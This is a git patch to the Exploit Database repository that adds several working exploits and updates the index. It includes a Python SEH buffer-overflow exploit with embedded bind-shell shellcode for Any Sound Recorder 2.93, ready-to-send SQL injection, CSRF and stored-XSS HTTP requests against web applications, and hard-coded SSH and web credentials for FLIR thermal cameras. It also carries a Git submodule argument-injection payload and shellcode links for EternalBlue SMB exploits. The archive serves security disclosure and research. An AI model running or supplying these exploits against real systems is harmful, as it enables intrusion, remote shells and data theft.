From 635345499a9041a871062cf08676fceb65db203d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 18 Oct 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-10-18 15 changes to exploits/shellcodes Git Submodule - Arbitrary Code Execution Git Submodule - Arbitrary Code Execution (PoC) Any Sound Recorder 2.93 - Buffer Overflow (SEH) Git Submodule - Arbitrary Code Execution Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials BigTree CMS 4.2.23 - Cross-Site Scripting Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin) TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure Time and Expense Management System 3.0 - 'table' SQL Injection --- exploits/hardware/remote/45629.txt | 32 ++++++ exploits/hardware/webapps/45632.txt | 19 ++++ exploits/linux/local/45631.md | 82 ++++++++++++++ exploits/php/webapps/45628.txt | 40 +++++++ exploits/php/webapps/45630.txt | 48 ++++++++ exploits/php/webapps/45633.txt | 105 ++++++++++++++++++ .../remote/42031.py | 4 + exploits/windows/remote/42315.py | 2 + .../remote/41987.py | 0 exploits/windows_x86-64/remote/42030.py | 4 + exploits/windows_x86/local/45627.py | 63 +++++++++++ files_exploits.csv | 13 ++- 12 files changed, 409 insertions(+), 3 deletions(-) create mode 100644 exploits/hardware/remote/45629.txt create mode 100644 exploits/hardware/webapps/45632.txt create mode 100644 exploits/linux/local/45631.md create mode 100644 exploits/php/webapps/45628.txt create mode 100644 exploits/php/webapps/45630.txt create mode 100644 exploits/php/webapps/45633.txt rename exploits/{windows_x86-64 => windows}/remote/42031.py (96%) rename exploits/{windows => windows_x86-64}/remote/41987.py (100%) create mode 100755 exploits/windows_x86/local/45627.py diff --git a/exploits/hardware/remote/45629.txt b/exploits/hardware/remote/45629.txt new file mode 100644 index 000000000..b9fa52f4d --- /dev/null +++ b/exploits/hardware/remote/45629.txt @@ -0,0 +1,32 @@ +# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-10-14 +# Vendor: FLIR Systems, Inc +# Product web page: https://www.flir.com +# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3 +# Hardware: Flir Systems Neco Board +# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14 +# References: +# Advisory ID: ZSL-2018-5494 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5494.php + +# Desc: The devices utilizes hard-coded and credentials within its Linux distribution +# image. These sets of credentials (SSH) are never exposed to the end-user and cannot +# be changed through any normal operation of the camera. Attacker could exploit this +# vulnerability by logging in using the default credentials for the web panel or gain +# shell access. + +# Hard-coded SSH access: +# ---------------------- + +fliruser:3vlig +root:hello + +# Default web creds: +# ------------------ + +admin:admin +user:user +viewer:viewer +service:??? +developer:??? \ No newline at end of file diff --git a/exploits/hardware/webapps/45632.txt b/exploits/hardware/webapps/45632.txt new file mode 100644 index 000000000..d000f5c6e --- /dev/null +++ b/exploits/hardware/webapps/45632.txt @@ -0,0 +1,19 @@ +# Exploit Title: TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-10-17 +# Vendor: TP-LINK Technologies Co., Ltd. +# Product web page: http://www.tp-link.com +# Affected version: 1.6.18P12_121101 +# Tested on: Boa/0.94.14rc21 +# CVE: N/A +# References: +# Advisory ID: ZSL-2018-5497 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5497.php + +Desc: The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized +live RTSP stream disclosure. + +# PoC: + +http://TARGET/jpg/image.jpg +rtsp://TARGET:554/video.3gp \ No newline at end of file diff --git a/exploits/linux/local/45631.md b/exploits/linux/local/45631.md new file mode 100644 index 000000000..6491fbc86 --- /dev/null +++ b/exploits/linux/local/45631.md @@ -0,0 +1,82 @@ +# CVE-2018-17456 + +I've gotten a couple of questions about exploitation for the +[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we +go with some technical details. + +## TL;DR + +[Here](https://github.com/joernchen/poc-submodule) is a PoC repository. +EDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip + +## Exploitation + +The `.gitmodules` file looks as follows: + +``` +[submodule "x:x"] + path = x:x + url = -u./payload +``` + +The actual command being injected is set by the url, `-u./payload` +points the `upload-pack` flag of git clone to the `payload` shell +script. Note also the `:` within the path, this part is needed to +actually get the `payload` script executed. + +The path will end up as the repository URL in the subsequent `clone` +operation: + +``` +execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone", +"--no-checkout", "--progress", "--separate-git-dir", +"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],... +``` + +As the actual URL from `.gitmodules` is interpreted as the `-u` +argument. + +The colon is due to the fact, that the colon character let us go past +those lines in `transport.c`: + +```c + } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) { + struct bundle_transport_data *data = xcalloc(1, sizeof(*data)); + transport_check_allowed("file"); + ret->data = data; + ret->vtable = &bundle_vtable; + ret->smart_options = NULL; +``` + +Due to `url_is_local_not_ssh` will return false due to the colon +in the path. And therefore later on in the code the smart_options +containing the `uploadpack` setting are still in place: + +```c + } else { + /* Unknown protocol in URL. Pass to external handler. */ + int len = external_specification_len(url); + char *handler = xmemdupz(url, len); + transport_helper_init(ret, handler); + } + + if (ret->smart_options) { + ret->smart_options->thin = 1; + ret->smart_options->uploadpack = "git-upload-pack"; + if (remote->uploadpack) + ret->smart_options->uploadpack = remote->uploadpack; + ret->smart_options->receivepack = "git-receive-pack";1 + if (remote->receivepack) + ret->smart_options->receivepack = remote->receivepack; + } +``` + +## Further hints + +The constraint to have a colon in the `path` seems to hinder exploitation on Windows +as a colon is a forbidden character within a path on Windows. However as noted by +some people during the disclosure: Git running within the Windows Subsystem for Linux or +cygwin will allow exploitation on Windows hosts. + +Etienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) +earlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592). \ No newline at end of file diff --git a/exploits/php/webapps/45628.txt b/exploits/php/webapps/45628.txt new file mode 100644 index 000000000..752b755e1 --- /dev/null +++ b/exploits/php/webapps/45628.txt @@ -0,0 +1,40 @@ +# Exploit Title: BigTree CMS 4.2.23 - Cross-Site Scripting +# Date: 2018-10-15 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.bigtreecms.org/ +# Software Link : https://github.com/bigtreecms/BigTree-CMS/ +# Software : BigTree CMS +# Version : 4.2.23 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : CVE-2018-18308 + +# In the 4.2.23 version of BigTree, a Stored XSS vulnerability has been discovered +# in /admin/ajax/file-browser/upload/ (aka the image upload area). + +# HTTP POST Request : + +POST /admin/ajax/file-browser/upload/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://TARGET/admin/pages/add/0/ +Content-Type: multipart/form-data; boundary=---------------------------15148507251045999311737722822 +Content-Length: 1574699 +Cookie: __utma=242042641.1054742390.1539547796.1539547796.1539547796.1; __utmb=242042641.6.10.1539547796; __utmc=242042641; __utmz=242042641.1539547796.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=fat2c61gglprnotletf1mobnui; hide_bigtree_bar=; bigtree_admin[email]=test%40ismailtasdelen.me; bigtree_admin[login]=%5B%22session-5bc3a4ae5b8016.12355027%22%2C%22chain-5bc3a4ae5b7966.37991866%22%5D; bigtree_admin%5Bpage_properties_open%5D=on +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------15148507251045999311737722822 +Content-Disposition: form-data; name="__csrf_token_B2FHVMV815XHACWV8RVV2BTX1EH1YEH6__" + +tNvtUi8PU/IDcrgxj1t/Uv/1ciYeF7AudslXD429hkQ= +-----------------------------15148507251045999311737722822 +Content-Disposition: form-data; name="folder" + +0 +-----------------------------15148507251045999311737722822 +Content-Disposition: form-data; name="files[]"; filename="\">.jpg" +Content-Type: image/jpeg \ No newline at end of file diff --git a/exploits/php/webapps/45630.txt b/exploits/php/webapps/45630.txt new file mode 100644 index 000000000..0c6a9184c --- /dev/null +++ b/exploits/php/webapps/45630.txt @@ -0,0 +1,48 @@ +# Exploit Title: Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin) +# Dork: N/A +# Date: 2018-10-17 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.initechs.com/ +# Software Link: http://sourceforge.net/projects/tems/files/latest +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# Description +# Normal member has all rights. + +# POC: +# 1) +# #Add,edit,delete admin+all users... +# http://localhost/[PATH]/index.php?action=ListUser +# http://localhost/[PATH]/index.php?action=BrowseUser&uid=1 +# Etc.. + +#Update admin.. +POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 227 +action=EditUser&uid=1&fullname=Administrator_Edit&email=admin@admin.com&title=Administrator_Edit&joindate=10%2F17%2F2018&reportto=admin&usergroup=&language=ENG&dateformat=MDY&status=10&debuglevel=3&dbtracelevel=0&preview_receipt=1 +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 00:46:35 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 10 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# /* `exploitdb`.`users` */ +# $users = array( +# array('uid' => '1','users_id' => 'admin','fullname' => 'Administrator_Edit','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'admin@admin.com','joindate' => '2018-10-17','reportto' => 'admin','title' => 'Administrator_Edit','status' => '10','authorizations_id' => '1','usergroup' => '','dateformat' => 'MDY','language' => 'ENG','u_menu_id' => '1','lastloginat' => '2018-10-17 00:46:50','access_count' => '4','debuglevel' => '3','dbtracelevel' => '0','preview_receipt' => '1','createat' => '2018-10-17 00:26:09','createby' => '*SYSTEM','changeat' => '2018-10-17 00:47:42','changeby' => 'efe') +# ); \ No newline at end of file diff --git a/exploits/php/webapps/45633.txt b/exploits/php/webapps/45633.txt new file mode 100644 index 000000000..89b4248cb --- /dev/null +++ b/exploits/php/webapps/45633.txt @@ -0,0 +1,105 @@ +# Exploit Title: Time and Expense Management System 3.0 - 'table' SQL Injection +# Dork: N/A +# Date: 2018-10-17 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.initechs.com/ +# Software Link: http://sourceforge.net/projects/tems/files/latest +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/core/model/GetTips.php?table=[SQL] + +# /[PATH]/core/model/GetTips.class.php +# ........ +# $hints_per_page = $_SESSION['ini']['display']['number_of_hints']; +# $userEntry=ltrim($_GET["userentry"]); +# $table = $_GET["table"]; +# $key = $_GET["field"]; +# $addlCond = $_GET["addl_cond"]; +# ........ + +GET /[PATH]/core/model/GetTips.php?table=112112+anD++EXtrACTvaLUE(112,ConcAT(0x5c,conCAT_WS(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT+(ELT(112=112,112))),0x49687361126e2053656e6361126e))--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 01:02:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=0kunt4k4d2piurnrcle7nftln5; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1612 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/core/model/GetTips.php?field=[SQL] + +# /[PATH]/core/model/GetTips.class.php +# ........ +# $hints_per_page = $_SESSION['ini']['display']['number_of_hints']; +# $userEntry=ltrim($_GET["userentry"]); +# $table = $_GET["table"]; +# $key = $_GET["field"]; +# $addlCond = $_GET["addl_cond"]; +# ........ + +GET /[PATH]/core/model/GetTips.php?field=112112+anD++EXtrACTvaLUE(112,ConcAT(0x5c,conCAT_WS(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT+(ELT(112=112,112))),0x49687361126e2053656e6361126e))--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=0kunt4k4d2piurnrcle7nftln5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 01:09:41 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1811 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/core/controller/UpdateBORequest.php[SQL] +# POST /action=[SQL] +# + +POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 161 +action=EditUser' anD EXtrACTvaLUE(112,ConcAT(0x5c,conCAT(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT (ELT(112=112,112))),0x49687361126e2053656e6361126e))-- Efe +HTTP/1.1 200 OK +Date: Wed, 17 Oct 2018 01:12:24 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1778 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows_x86-64/remote/42031.py b/exploits/windows/remote/42031.py similarity index 96% rename from exploits/windows_x86-64/remote/42031.py rename to exploits/windows/remote/42031.py index 4a1359133..1fc2d68a9 100755 --- a/exploits/windows_x86-64/remote/42031.py +++ b/exploits/windows/remote/42031.py @@ -8,6 +8,10 @@ import socket EternalBlue exploit for Windows 7/2008 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) +EDB Note: Shellcode +- x64 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42030.asm +- x86 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42031.asm + Tested on: - Windows 7 SP1 x64 - Windows 2008 R2 SP1 x64 diff --git a/exploits/windows/remote/42315.py b/exploits/windows/remote/42315.py index 06a619832..cbe0da6c4 100755 --- a/exploits/windows/remote/42315.py +++ b/exploits/windows/remote/42315.py @@ -9,6 +9,8 @@ import time ''' MS17-010 exploit for Windows 2000 and later by sleepya +EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py + Note: - The exploit should never crash a target (chance should be nearly 0%) - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed diff --git a/exploits/windows/remote/41987.py b/exploits/windows_x86-64/remote/41987.py similarity index 100% rename from exploits/windows/remote/41987.py rename to exploits/windows_x86-64/remote/41987.py diff --git a/exploits/windows_x86-64/remote/42030.py b/exploits/windows_x86-64/remote/42030.py index 1eef6b52e..782455427 100755 --- a/exploits/windows_x86-64/remote/42030.py +++ b/exploits/windows_x86-64/remote/42030.py @@ -9,6 +9,10 @@ EternalBlue exploit for Windows 8 and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target +EDB Note: Shellcode +- x64 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42030.asm +- x86 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42031.asm + Tested on: - Windows 2012 R2 x64 - Windows 8.1 x64 diff --git a/exploits/windows_x86/local/45627.py b/exploits/windows_x86/local/45627.py new file mode 100755 index 000000000..9a18b1ea0 --- /dev/null +++ b/exploits/windows_x86/local/45627.py @@ -0,0 +1,63 @@ +# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH) +# Exploit Author: Abdullah Alic +# Discovery Date: 2018-10-16 +# Homepage: http://www.any-sound-recorder.com +# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe +# Version: 2.93 +# Tested on: Windows XP Professional sp3 (ENG) +# Steps to Reproduce: Run the python exploit script, it will create a new file +# with the name "boom.txt". Copy the content of the "boom.txt". +# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register" +# Connect victim machine on port 4444 + +#!/usr/bin/python + +#Payload size: 355 bytes +#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python +buf = "" +buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31" +buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7" +buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6" +buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b" +buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92" +buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b" +buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85" +buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d" +buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07" +buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0" +buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08" +buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d" +buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26" +buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e" +buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce" +buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d" +buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82" +buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80" +buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9" +buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19" +buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54" +buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4" +buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05" +buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f" +buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a" +buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b" +buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62" +buf += "\x98\x86\x36\xa7" + +junk = 10000 +nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes +seh= "\x35\x2f\xd1\x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv + +buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf)) +payload = buffer + +#badchars \x00 \x0a \x0d + +try: + f=open("boom.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b9280f501..dbf4c5c06 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10023,7 +10023,7 @@ id,file,description,date,author,type,platform,port 45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux, 45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux, 45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86, -45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution",2018-10-05,"Junio C Hamano",local,linux, +45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution (PoC)",2018-10-05,"Junio C Hamano",local,linux, 45553,exploits/linux/local/45553.c,"Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation",2018-10-02,Lexfo,local,linux, 45560,exploits/windows/local/45560.rb,"Zahir Enterprise Plus 6 - Stack Buffer Overflow (Metasploit)",2018-10-08,Metasploit,local,windows, 45562,exploits/windows/local/45562.rb,"Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)",2018-10-08,Metasploit,local,windows, @@ -10035,6 +10035,8 @@ id,file,description,date,author,type,platform,port 45598,exploits/windows_x86/local/45598.py,"Snes9K 0.0.9z - Buffer Overflow (SEH)",2018-10-15,"Abdullah Alıç",local,windows_x86, 45625,exploits/solaris/local/45625.rb,"Solaris - RSH Stack Clash Privilege Escalation (Metasploit)",2018-10-16,Metasploit,local,solaris, 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows, +45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, +45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16578,7 +16580,7 @@ id,file,description,date,author,type,platform,port 42587,exploits/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,remote,hardware,9251 42316,exploits/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,remote,windows, 42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)",2017-09-25,Metasploit,remote,linux,9001 -41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows, +41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64, 42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware, 41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 @@ -16618,7 +16620,7 @@ id,file,description,date,author,type,platform,port 42024,exploits/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,remote,php, 42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,remote,php,80 42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",remote,xml, -42031,exploits/windows_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445 +42031,exploits/windows/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows,445 42083,exploits/windows/remote/42083.rb,"Octopus Deploy - (Authenticated) Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows, 42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,remote,linux, 42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,remote,windows, @@ -16873,6 +16875,7 @@ id,file,description,date,author,type,platform,port 45561,exploits/php/remote/45561.rb,"Navigate CMS - Unauthenticated Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,php, 45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502 45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows, +45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40143,3 +40146,7 @@ id,file,description,date,author,type,platform,port 45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, 45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, 45623,exploits/hardware/webapps/45623.sh,"Heatmiser Wifi Thermostat 1.7 - Credential Disclosure",2018-10-16,d0wnp0ur,webapps,hardware, +45628,exploits/php/webapps/45628.txt,"BigTree CMS 4.2.23 - Cross-Site Scripting",2018-10-17,"Ismail Tasdelen",webapps,php, +45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 